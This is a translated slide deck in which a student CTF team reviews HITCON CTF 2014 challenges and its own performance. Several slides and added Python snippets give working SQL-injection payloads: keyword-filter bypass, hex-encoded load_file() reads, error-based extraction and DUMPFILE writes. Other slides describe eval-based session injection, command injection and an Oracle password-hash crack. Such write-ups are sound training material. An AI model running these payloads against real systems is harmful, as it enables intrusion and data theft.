HITCON CTF 2014 BambooFox 解題心得分享 (HITCON CTF 2014: BambooFox's problem-solving notes)

This is about the experience in HITCON 2014.



1. 陳仲寬 (bletchley)

2. Outline
- Introduction to BambooFox
- How we approached the competition
- CTF review and improvements
- BambooFox's future goals

3. A long, long time ago
- DSNS vs SQLab
- A lab specialising in attack
- A lab specialising in security defence

4. Formidable opponents
- World-class CTF teams took part: PPP, Dragon Sector, 9447, Blue-lotus, Oops, More Smoked Leet Chicken, ...

5. BambooFox

6. BambooFox
- BambooFox = SQLab ∪ DSNSLab ∪ CSCC ∪ some friends
- SQLab: Software Quality Lab
- DSNSLab: Network Security Lab
- CSCC: the computing centre of the NCTU CS department
- The groups bring different expertise, so they complement each other

7. About these notes
- Time is limited, so this talk only covers some of the problems
- The member named on each problem is the one who provided the content
- Every problem was solved by several members working together, and all of them contributed
- Everyone was busy solving, so there are not many photos in this talk...
- We plan to compile writeups for everyone's reference

8. Information-sharing platform
- Trello + Skype

9. No artificial intelligence, just plenty of manual intelligence
- Maze, Puzzle
- Some problems have many special cases, so writing a program is not necessarily faster
- The Maze transmission contained special characters that broke parsing
- Members without a security background can start with these problems

10. Maze
- Use a telnet connection to play a maze game
- The whole maze map is actually a 91x91 QR code
- To find the flag, we need to walk through every location, record it and draw it on screen
- By computer? By hand?

11. Maze - by hand
- Why not just do it by hand :D
- Easy to convert into a real QR code
- Need to concentrate hard on the pictures
- Can mark routes while solving
- Hard for a QR code reader to decode when the map is drawn with characters

12. Puzzle
- Compared it with the original image and found that the visible content did not differ
- Google, Wiki
- Turned to analysing the header and found the JFXX marker (JFIF extension segments, which can carry an embedded image) 100 times
- Extracted the images stored in the JFXX segments
- Wrote simple tools to make things easy
- If you want to try, follow this link: http://people.cs.nctu.edu.tw/~chhhsu/puzzle/

13. 24
- Python's ** (exponentiation) and // (floor division)
- Every number may be prefixed with - to make it negative
- Permutation
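A solver along the lines slide 13 describes, added here as an illustration (it is not the team's code; ensky's writeup linked at the end is the original). It assumes the challenge hands over four integers and accepts +, -, *, /, ** and //, with an optional unary minus on each number; the operator set and the bound on exponents are assumptions. Trying every ordered pair of remaining values covers every permutation and bracketing, so no explicit permutation step is needed.

```python
from fractions import Fraction
from itertools import product

# Operators the slide lists: the four basic ones plus Python's ** and //.
OPS = ("+", "-", "*", "/", "**", "//")

def apply_op(a, b, op):
    """Combine two Fractions; return None when the result is undefined, or when
    an exponent is fractional or large enough to blow up the search (assumed bound)."""
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if op == "*":
        return a * b
    if op == "/":
        return a / b if b != 0 else None
    if op == "//":
        return Fraction(a // b) if b != 0 else None
    if op == "**":
        if b.denominator != 1 or abs(b) > 10 or (a == 0 and b < 0):
            return None
        return a ** int(b)
    raise ValueError(op)

def solve24(numbers, target=24, limit=10**12):
    """Return an expression string that evaluates to `target`, or None.

    Each number may carry a unary minus (all sign choices come from `product`);
    the search then combines any ordered pair of remaining values with any
    operator until one value is left. Fraction keeps 8/(3-8/3) exact, results
    beyond `limit` are pruned, and a multiset of values is explored only once."""
    seen = set()

    def search(items):
        if len(items) == 1:
            value, expr = items[0]
            return expr if value == target else None
        key = tuple(sorted(v for v, _ in items))
        if key in seen:
            return None
        seen.add(key)
        for i in range(len(items)):
            for j in range(len(items)):
                if i == j:
                    continue
                rest = [items[k] for k in range(len(items)) if k not in (i, j)]
                (a, ea), (b, eb) = items[i], items[j]
                for op in OPS:
                    r = apply_op(a, b, op)
                    if r is None or abs(r) > limit:
                        continue
                    found = search(rest + [(r, "(%s %s %s)" % (ea, op, eb))])
                    if found is not None:
                        return found
        return None

    for signs in product((1, -1), repeat=len(numbers)):
        # negative leaves are bracketed so "(-3) ** 2" re-evaluates as intended
        items = [(Fraction(s * n), "(%d)" % (s * n) if s * n < 0 else str(s * n))
                 for s, n in zip(signs, numbers)]
        found = search(items)
        if found is not None:
            return found
    return None
```

The returned string is plain Python, so the answer can be checked with eval before it is submitted; the classic 3 3 8 8 case only works because intermediate values are kept as exact fractions.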
14. A strong web group
- Two seniors from industry laid the groundwork for web
- They made up for the students' lack of practical experience
- Web challenges vary a lot and involve too many technologies; you need the ability to pick up new techniques quickly

15. PY4H4SHER
- The problem lets you download the py4h4sher.pl source right away, with a checksum for the download, so it downloads successfully
- After downloading we found four checks to get past:
  1. Without the secret, how do we satisfy _md5( SECRET + query_str ) == checksum?
  2. if m_hash(stage1) != '4141414141414141': gotofail()
  3. _pbkdf2(plaintext) != _pbkdf2(stage2): gotofail()
  4. if _md5( stage3 ) != '90954349a0e42d8e4426a4672bde16b9': gotofail()
- Approach:
  1. Send the parameters via POST to dodge the checksum check, which is computed over the query string only
  2. Stage 1: solved with a MySQL old-password hash collision
  3. Stage 2: PBKDF2+HMAC collision (found by googling)
  4. Stage 3: googling the MD5 quickly shows stage3 is enigma; the hard part is the line stage3 = stage3[0]+stage3[1]+stage3[3]+stage3[5], which we got around with stage3=en&stage3=i&stage3=X&stage3=gm&stage3=X&stage3=a; the final result is shown in the figure below
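Two of the stage bypasses above, reproduced in Python as an added example (this is not py4h4sher.pl and not the team's code). Stage 2 is modelled with the well-known HMAC property that a key longer than the hash's block size is replaced by its hash, so a password and H(password) give identical PBKDF2 output; the slide does not say which collision the team found, and the choice of SHA-1 is an assumption. Stage 3 assumes the Perl script indexed a list when the parameter was repeated, which is what the slide's repeated-parameter trick relies on.

```python
import hashlib
from urllib.parse import parse_qs

def hmac_equivalent_key(key, hash_name="sha1"):
    """HMAC (RFC 2104) replaces any key longer than the block size with H(key),
    so `key` and H(key) produce the same HMAC; PBKDF2 uses HMAC keyed with the
    password, so both passwords derive the same key. Requires len(key) > block size."""
    block_size = hashlib.new(hash_name).block_size
    if len(key) <= block_size:
        raise ValueError("key must be longer than the %d-byte block size" % block_size)
    return hashlib.new(hash_name, key).digest()

def pbkdf2_collides(password, salt, iterations=1000, hash_name="sha1"):
    """True when `password` and its HMAC-equivalent twin give the same PBKDF2 output."""
    twin = hmac_equivalent_key(password, hash_name)
    a = hashlib.pbkdf2_hmac(hash_name, password, salt, iterations)
    b = hashlib.pbkdf2_hmac(hash_name, twin, salt, iterations)
    return password != twin and a == b

def rebuild_stage3(query_string):
    """Model of the check stage3 = stage3[0]+stage3[1]+stage3[3]+stage3[5].
    With a single value the indices pick characters, so 'enigma' becomes 'enga';
    with a repeated parameter the CGI layer hands back a list and the indices
    pick whole chunks (assumption about the Perl side, matching the slide's trick)."""
    values = parse_qs(query_string, keep_blank_values=True)["stage3"]
    stage3 = values[0] if len(values) == 1 else values
    return stage3[0] + stage3[1] + stage3[3] + stage3[5]
```

Any password longer than 64 bytes therefore has a 20-byte twin with the same PBKDF2-HMAC-SHA1 output, which is why a check that compares derived keys cannot tell the two apart.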
16. Easyinj
- Three initial clues
- The beauty of this problem is the cheeky error message, which tells you straight out that it is a MySQL error-based injection
  - The most compact MySQL error-based injection looks like this: ' and (select 1 from(select count(*),concat(@@version, floor(rand(0)*2))x from log group by x)a))#
- The other twist: when you enter certain sensitive strings such as select and from, they are replaced with the empty string
- The error message also contains the program path, so the first step is to download the source with load_file()
  - The error message then revealed that . is also replaced, so we switched to hex notation: load_file(0x433a5c5c57696e646f77735c5c7068702e696e6920)
  - The load_file data is too long and causes a timeout error, so the query has to be split into pieces with substr; in the end we got the source code

17. Easyinj
- Found that we had write permission, that stacked queries were possible, and, from the source obtained earlier, that a folder log_guess^2/ is used for writing logs
- So a read-and-write-file query can be written like this (each filtered keyword is nested inside itself, so removing one copy leaves the other intact): 54.238.22.67:10653/index.php?ip=');sselectelect%20LOload_fileAD_FILE(0x433a5c5c57696e646f77735c5c7068702e696e6920)%20INintoTO%20DUMPdumpfileFILE%20'Z:AppServwwwlog_guess^2jpeanut9'%23
- In the end we still did not know how to bypass the . filter, but since someone had managed to write tedsdt.php, we LOADed their .php to see what they had written, and found this odd thing: z:key_39uti2jb.txt
- Reading that file gave us the key XD
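The filter bypass and the hex-encoded, chunked load_file() reads from the two slides above, written out in Python as an added example (not the challenge's code or the team's). The blacklist and its single-pass, case-insensitive behaviour are assumptions reconstructed from the clues on the slides; the table name log and the duplicate-key error-based wrapper are the ones the slide shows.

```python
import re

# Blacklist reconstructed from the slide's clues (these tokens were seen to
# vanish from the query); the challenge's real list is unknown.
BLACKLIST = ("select", "from", "load_file", "into", "dumpfile", ".")

def strip_filter(text):
    """Model of the server-side filter: one non-recursive pass that deletes each
    blacklisted token. Case-insensitivity is an assumption; the bypass works
    either way because only one copy of each keyword is removed."""
    for token in BLACKLIST:
        text = re.sub(re.escape(token), "", text, flags=re.IGNORECASE)
    return text

def nest(keyword):
    """Embed a sacrificial copy of the keyword inside itself: deleting the inner
    copy reassembles the outer one (select -> sselectelect -> select)."""
    return keyword[:1] + keyword + keyword[1:]

def hex_literal(s):
    """MySQL accepts 0x... hex literals where a string is expected, so a path can
    be passed without quotes and without the filtered '.' character."""
    return "0x" + s.encode().hex()

def read_payload(path, offset, length, table="log"):
    """Error-based injection (duplicate-key trick) that leaks `length` bytes of
    `path` starting at 1-based `offset`; chunking with substr keeps a long
    load_file() result from timing out, and every filtered keyword is nested."""
    sel, frm, lf = nest("select"), nest("from"), nest("load_file")
    column = "substr(%s(%s),%d,%d)" % (lf, hex_literal(path), offset, length)
    return ("' and (%s 1 %s(%s count(*),concat(%s,floor(rand(0)*2))x %s %s group by x)a)#"
            % (sel, frm, sel, column, frm, table))

def write_payload(path, dest):
    """Stacked query that copies `path` into `dest` with INTO DUMPFILE. The
    destination is a quoted string, so it cannot contain '.', which is exactly
    the limit the team hit: no .php extension without a bypass for '.'."""
    if "." in dest:
        raise ValueError("'.' is filtered; the destination path cannot contain one")
    return "');%s %s(%s) %s %s '%s'#" % (
        nest("select"), nest("load_file"), hex_literal(path), nest("into"), nest("dumpfile"), dest)
```

Running strip_filter over the generated payloads shows the query the database actually sees; the single-pass replace is the defect, since a filter that repeats until nothing changes (or, better, a parameterised query) would not be fooled by nesting.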
18. DIAGCGI
- Core concept:
- curl: local file copy and rename
- Download the main Perl CGI program
- Check how the program identifies and verifies the user
- We can find how they use the session argument
- It is passed to eval() instead of being parsed
- Put code in that session file and get the flag

19. Outside help is usually powerful
- The problem was solved before we had even seen it

20. Solving problems as a team
- Many problems need several different lines of thought to solve
- Communicating and discussing speeds up organising one's thinking

21. The polyglot, a joint effort
- Started from thinking about the polyglot in DEF CON 22
- The DEF CON polyglot: write shellcode compatible with different architectures
- This polyglot: write a script compatible with different languages
- Basic idea proposed:
  - Make each piece of code a comment in the other languages
  - Make good use of syntax the languages have in common
  - Deal with the differences between the languages
- Everyone frantically tested different syntax
- Use readFile in Haskell instead of System.Cmd
- Sometimes handing the problem to someone else brings a different line of thought

22. Polyglot
- `cat flag` in Python, C, Ruby, Haskell
- A string works as a comment in Python and Ruby
- Use """ " to distinguish the Python string from the Ruby string
- In Ruby, everything after __END__ is a comment
- # is a C preprocessor command and a single-line comment in both Python and Ruby

23. Polyglot
- {- Block comment in Haskell -}
- Make {- legal in the other languages
- x={-"""1".to_i=>"2""".count('1')};
- It means x = { -1 } in Python and x = { -1 => 0 } in Ruby
- Make it mean x = { -'1' }; in C by inserting #ifdef into it
- Use readFile instead of import System.Cmd to avoid Haskell's rule that imports must be at the beginning of the code

24. The final polyglot

```
x={-
#ifdef AAAAA
"""1".to_i=>"2""".count(
#endif
'1'
#ifdef BBBBB
)
#endif
};
#include <stdlib.h>
/* """ "
print `cat flag`
__END__
*/
int main(){ system("cat flag"); }
/* """
import sys, subprocess
sys.stdout.write(subprocess.check_output(['cat', 'flag']).decode("utf-8"))
# */ // -}1; main = readFile "flag" >>= putStr
```

25. Ducky
- The C source may not use ( ) ; < > [ ] { }
- Found that the stack is executable, so we tried to build a piece of shellcode named main
- main[] = {"shellcode"} -> fail
- utf8_t* main = "shellcode" -> fail
- main = first byte of the shellcode, main1 = second byte, ...

26. The binaries we never cracked
- Binary problems usually have a high entry threshold; you need a certain level to solve them
- Stkof, Ty, Callme, Sha1lcode, ...

27. Environment setup
- Stand the server up and analyse it dynamically
- Static analysis alone makes the problem hard to find
- Easier to analyse
- Lets you test your own exploit

28. Ty
- Ty: ARM64
- QEMU
- ARMv8 FVP model
- Debugging/network
- Spent a lot of time setting up the VM

29. Throw input at it first
- Test for common vulnerabilities: long strings, format strings
- Look for a crash or other clues

30. Rsbo
- Found that stuffing in a long string crashes it
- Reads 0x80 bytes into a buffer of size 80
- DEP + ASLR
- The buffer contents are exchanged at random positions
- Fill the buffer with zeros
- Make every byte that takes part in the exchange 0x00
- Bypasses the randomisation
- Read more input
- Try to call read_80_bytes again

31. Reverse the binary into pseudocode
- With no idea where to start, first try translating it into pseudocode
- Organises your thinking
- Makes it easier for other members to join in
- Callme: found a BOF but ran into a stack cookie
- Considered leaking the stack cookie, or using the exception handler
- QQ
32. hop - reverse
- Windows 64-bit PE
- It prints "Key:" and reads input from the user
- Use "String Reference" to locate the important code
- The most important part is the function sub_401590

33. hop - reverse
- The program "hops" by indirect jump to many positions; every code section looks like the one shown
- Note that the "pop rax" is each character of the input key
- Just like a function-table lookup: if our answer is wrong, it returns 0; otherwise it returns 1

34. hop - reverse
- We first find all code sections by scanning the binary for the byte pattern; there are over 130 of them
- By analysing these sections, we can find every destination section of each section
- These sections form an "automaton", which reminds me of "automata" from Boston Key Party 2014
- Find the correct path (the key), which steps through over 40 states and finally reaches the "return 1" state
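Once every section has been mapped to its destinations, as slide 34 describes, recovering the key is a path search over that automaton. The following is an added example (not the team's script and not the hop binary's real tables): the transition table is a constructed stand-in with the same shape, one section per key character plus decoy sections for wrong characters, and the section names, alphabet and key are invented for the demonstration.

```python
from collections import deque

# Names given here to the two terminal sections the slide describes.
ACCEPT, REJECT = "return_1", "return_0"

def find_key(transitions, start, accept=ACCEPT):
    """Breadth-first search over the section graph. Each edge consumes one input
    character (the byte the section pops into rax); the shortest character
    sequence that reaches the accepting section is the key, or None if there is none."""
    queue = deque([(start, "")])
    seen = {start}
    while queue:
        section, path = queue.popleft()
        if section == accept:
            return path
        for ch, nxt in sorted(transitions.get(section, {}).items()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + ch))
    return None

def build_sample_automaton(key, alphabet):
    """Constructed stand-in for the tables recovered from the binary: a map
    section -> {input char: next section}. The expected character advances to
    the next section; any other character lands in a decoy that only leads to
    return_0, mimicking the 'wrong answer returns 0' behaviour on the slide."""
    transitions = {ACCEPT: {}, REJECT: {}}
    for i, expected in enumerate(key):
        section, decoy = "section_%d" % i, "decoy_%d" % i
        nxt = "section_%d" % (i + 1) if i + 1 < len(key) else ACCEPT
        transitions[section] = {c: (nxt if c == expected else decoy) for c in alphabet}
        transitions[decoy] = {c: REJECT for c in alphabet}
    return transitions, "section_0"
```

With the real binary the table comes from the pattern scan and destination analysis described above; since the accepting path is over 40 states long and every wrong byte dead-ends, a breadth-first walk finds it without ever running the program.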
35. Competition results

36. CTF review and improvements
- Think about your mistakes and do better next time

37. Preparing the environment before the competition
- We lacked ARM and ARM64 environments
- How could we have known there would be an HSA problem...
- Girby
- Our HSA expert was away on vacation T.T

38. Strengthen pwn and reverse training
- High threshold and time-consuming, but often what decides the game:
  1. Setting up the environment
  2. Reverse engineering
  3. Program analysis to find the weakness
  4. Writing the exploit
- This time several problems got stuck at steps 2 and 3
- Not enough training in bypassing defence mechanisms

39. Sensible allocation of people
- Many people, with a lot of diversity
- Hsinchu, Taipei
- Security background, no security background
- Day shift, night shift
- Data sometimes went unsynchronised, and several people ended up writing the same program

40. BambooFox's future goals
- An NCTU student security community
- CTF and security-related training
- Sharing security research
- Actively taking part in security competitions, domestic and international

41. Thanks
- Thanks to these members who helped me prepare these slides: Ddaa, jpeanut, ding, Benson chen, Nier, Adavis10006, Lucaus wei, Ensky

42. Appendix

43. Reflections
- Recognising attack techniques and understanding them in detail is the foundation for strengthening both the breadth and the depth of security defence, and playing wargames is a very good way to train; I hope friends interested in security will come and play more wargames. (Ding)
- The score gap to the other strong teams comes mainly from the pwn category; we will practise this area harder in future. (ddaa)

44. G8LA
- Oracle CVE-2012-3137
- Found the user FLAG => AUTH_SESSKEY, AUTH_VFR_DATA
- https://github.com/magnumripper/JohnTheRipper
- john cracked m3o3rt m3odha m3odha; we then brute-forced with a dictionary of words starting with m3o until m3ow00 was the correct one; no idea why it produced so many candidates
- DIAGCGI
- After modifying /tmp/cookie we could execute a shell
- After all that fiddling, Xatierlike Lee simply used command injection: /read_key /key.txt

45. Finger
- This is a rock-paper-scissors game
- It MD5s every 16 characters you input, sums them and checks later
- If we can bypass the boss's attack then it is possible to win
- If guess wrong, che

46. Finger
- We don't want to find a collision XD
- We just cheat when we know the boss is going to win, so the boss cannot attack us
- Boss wins: our HP -1
- Tie: both HP -0
- We win: boss HP -rand(1..3)

47. Writeups
- http://pastebin.com/JqBFKfvu, by xatierlike Lee
- http://ensky.logdown.com/posts/2014/08/20/hitcon-ctf-2014-24, by ensky
- http://ddaa.logdown.com/posts/221204-hitcon-ctf-2014-pwn-150-rsbo, by ddaa
